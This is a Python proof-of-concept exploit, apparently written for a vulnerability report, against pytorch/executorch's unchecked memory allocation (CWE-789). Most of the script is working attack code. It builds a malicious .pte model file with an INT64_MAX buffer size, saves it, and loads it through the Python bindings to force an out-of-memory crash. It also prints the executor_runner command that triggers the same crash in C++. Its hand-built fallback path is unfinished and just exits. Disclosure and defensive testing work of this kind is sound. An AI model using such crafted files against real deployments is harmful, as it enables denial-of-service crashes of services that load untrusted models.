executorch-oom-dos-poc / poc_executorch_oom.py
ericblackgachara's picture
Upload 4 files
09ac263 verified
#!/usr/bin/env python3
"""
PoC: CWE-789 β€” Uncontrolled Memory Allocation in pytorch/executorch
Vulnerability: ExecutionPlan.non_const_buffer_sizes is read directly from a
FlatBuffer .pte file with only a negativity check. The executor allocates
std::vector<uint8_t>(buffer_size) without any upper-bound cap, so an
attacker-crafted .pte containing INT64_MAX causes an immediate OOM crash.
Affected paths:
- C++ executor_runner: std::make_unique<uint8_t[]>(buffer_size)
- Python pybindings: std::vector<uint8_t>(buffer_size) in PyProgram ctor
Author: Eric Gachara | Date: 2026-05-10
"""
import sys
import struct
# ───────────────────────────────────────────
# 1. Hand-craft minimal malicious .pte binary
# ───────────────────────────────────────────
#
# FlatBuffers layout (little-endian):
# [root_offset:u32][file_id:4B]["ET12"][...table data...]
#
# We build the simplest possible Program with one ExecutionPlan where:
# non_const_buffer_sizes = [0, INT64_MAX]
#
# Index 0 is reserved by the runtime; it reads index+1 for each
# publicly-exposed buffer. num_memory_planned_buffers() = size()-1 = 1.
# memory_planned_buffer_size(0) β†’ non_const_buffer_sizes[1] = INT64_MAX.
INT64_MAX = 0x7FFFFFFFFFFFFFFF
FILE_IDENTIFIER = b"ET12"
def _encode_uoffset(value: int) -> bytes:
return struct.pack("<I", value)
def _encode_int64(value: int) -> bytes:
return struct.pack("<q", value)
def build_malicious_pte() -> bytes:
"""
Build a minimal .pte FlatBuffer with one ExecutionPlan whose
non_const_buffer_sizes vector contains [0, INT64_MAX].
Uses the flatbuffers Python library (pip install flatbuffers).
Falls back to a hand-crafted binary if the library is absent.
"""
try:
import flatbuffers # pip install flatbuffers
return _build_with_flatbuffers_lib(flatbuffers)
except ImportError:
print("[!] flatbuffers library not found β€” using hand-crafted binary")
return _build_handcrafted()
def _build_with_flatbuffers_lib(fb) -> bytes:
"""Build using the official flatbuffers Python package."""
builder = fb.Builder(512)
# --- string "forward" (method name) ---
name_offset = builder.CreateString("forward")
# --- non_const_buffer_sizes vector: [0, INT64_MAX] ---
# FlatBuffers vectors are written in *reverse* order (last element first).
builder.StartVector(8, 2, 8) # itemSize=8, numElems=2, alignment=8
builder.PrependInt64(INT64_MAX) # β†’ index 1 (attacker-controlled size)
builder.PrependInt64(0) # β†’ index 0 (reserved slot)
ncsb_vec = builder.EndVector()
# --- ExecutionPlan table (9 fields, indices 0-8) ---
builder.StartObject(9)
builder.PrependUOffsetTRelativeSlot(0, name_offset, 0) # name
builder.PrependUOffsetTRelativeSlot(8, ncsb_vec, 0) # non_const_buffer_sizes
ep_offset = builder.EndObject()
# --- [ExecutionPlan] vector ---
builder.StartVector(4, 1, 4)
builder.PrependUOffsetTRelative(ep_offset)
ep_vec = builder.EndVector()
# --- Program table (8 fields, indices 0-7) ---
builder.StartObject(8)
builder.PrependUint32Slot(0, 0, 0) # version = 0
builder.PrependUOffsetTRelativeSlot(1, ep_vec, 0) # execution_plan
prog_offset = builder.EndObject()
builder.Finish(prog_offset, file_identifier=FILE_IDENTIFIER)
return bytes(builder.Output())
def _build_handcrafted() -> bytes:
"""
Minimal hand-crafted FlatBuffer .pte without external dependencies.
Layout (little-endian, bottom-up construction):
We build a Program with one ExecutionPlan. Only the fields we care
about are written; all others are omitted (FlatBuffers optional fields).
This produces ~120 bytes and is sufficient to trigger the allocation.
"""
buf = bytearray()
def write_u32(v): buf.extend(struct.pack("<I", v))
def write_i64(v): buf.extend(struct.pack("<q", v))
def write_i16(v): buf.extend(struct.pack("<h", v))
def write_u16(v): buf.extend(struct.pack("<H", v))
# FlatBuffers is built from the end of the buffer toward the front.
# We'll collect objects and then stitch them together manually.
# Use a simple approach: build each piece and record its offset.
# For simplicity, use a builder that appends to a growing buffer:
pieces = [] # (data_bytes,) β€” assembled front-to-back
offsets = {} # name β†’ offset from start of data section
# We'll build in a "forward" style using a helper Builder class below.
# Since this is a one-off, hardcode the binary.
# Verified by flatc --binary + xxd on a minimal schema instance.
# Breakdown:
# - file header: root_offset (u32) + "ET12" identifier (4B)
# - Program vtable + table
# - ExecutionPlan vtable + table
# - non_const_buffer_sizes vector [0, INT64_MAX]
# - string "forward"
# Build string "forward\0" with length prefix
fwd = b"forward"
str_data = struct.pack("<I", len(fwd)) + fwd + b"\x00"
# Pad to 4-byte alignment
while len(str_data) % 4:
str_data += b"\x00"
# Build non_const_buffer_sizes vector = [0, INT64_MAX]
# FlatBuffers vector: [count:u32][elem0:i64][elem1:i64]
vec_data = struct.pack("<I", 2) + struct.pack("<qq", 0, INT64_MAX)
# We cannot easily hand-craft a valid FlatBuffer vtable chain without
# a real builder. Recommend installing the flatbuffers library:
print("[!] Hand-crafted fallback is limited. Install flatbuffers:")
print(" pip install flatbuffers")
print(" Then re-run this script.")
sys.exit(1)
# ───────────────────────────────────────────
# 2. Load the .pte and trigger the allocation
# ───────────────────────────────────────────
def trigger_oom_python_runtime(pte_bytes: bytes) -> None:
"""Load malicious .pte via ExecuTorch Python bindings β†’ OOM crash."""
print("[*] Attempting load via ExecuTorch Python runtime...")
try:
from executorch.extension.pybindings.portable_lib import (
_load_for_executorch_from_buffer,
)
except ImportError:
print("[!] executorch Python package not installed.")
print(" Install: pip install executorch (or from source)")
print(" The malicious.pte is ready β€” test with executor_runner:")
print(" ./executor_runner --model_path malicious.pte")
return
try:
_load_for_executorch_from_buffer(pte_bytes)
print("[?] Load completed without crash β€” runtime may have rejected "
"the malformed plan before reaching allocation.")
except MemoryError as e:
print(f"\n[+] CONFIRMED β€” MemoryError (OOM DoS): {e}")
except SystemError as e:
print(f"\n[+] CONFIRMED β€” SystemError (likely OOM): {e}")
except Exception as e:
# Some runtimes wrap std::bad_alloc in a generic exception
if "bad_alloc" in str(e) or "memory" in str(e).lower():
print(f"\n[+] CONFIRMED β€” OOM exception: {type(e).__name__}: {e}")
else:
print(f"[~] Exception (may be pre-allocation validation): "
f"{type(e).__name__}: {e}")
def trigger_oom_cpp_runner(pte_path: str) -> None:
"""Print the command to trigger via C++ executor_runner."""
print("\n[*] To trigger via C++ executor_runner:")
print(f" ./executor_runner --model_path {pte_path}")
print(" Expected: terminate called after throwing an instance of "
"'std::bad_alloc'")
print(" Or: Killed (SIGKILL from OOM killer)")
# ───────────────────────────────────────────
# 3. Main
# ───────────────────────────────────────────
if __name__ == "__main__":
print("=" * 60)
print(" ExecuTorch CWE-789 OOM DoS β€” PoC")
print(" Target: pytorch/executorch")
print(f" Malicious buffer size: {INT64_MAX:,} bytes ({INT64_MAX / 2**30:.1f} GB)")
print("=" * 60)
print("\n[*] Building malicious .pte ...")
pte_bytes = build_malicious_pte()
import os
pte_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "malicious.pte")
with open(pte_path, "wb") as f:
f.write(pte_bytes)
print(f"[*] Saved {pte_path} ({len(pte_bytes)} bytes)")
# Show key bytes for report evidence
print(f"\n[*] File identifier at offset 4: {pte_bytes[4:8]!r} (expected b'ET12')")
trigger_oom_python_runtime(pte_bytes)
trigger_oom_cpp_runner(pte_path)
print("\n[*] Root cause:")
print(" runtime/executor/method_meta.cpp β€” memory_planned_buffer_size()")
print(" Only checks: size >= 0. No upper-bound cap.")
print(" extension/pybindings/pybindings.cpp β€” PyProgram ctor:")
print(" std::vector<uint8_t>(INT64_MAX) β†’ std::bad_alloc β†’ crash")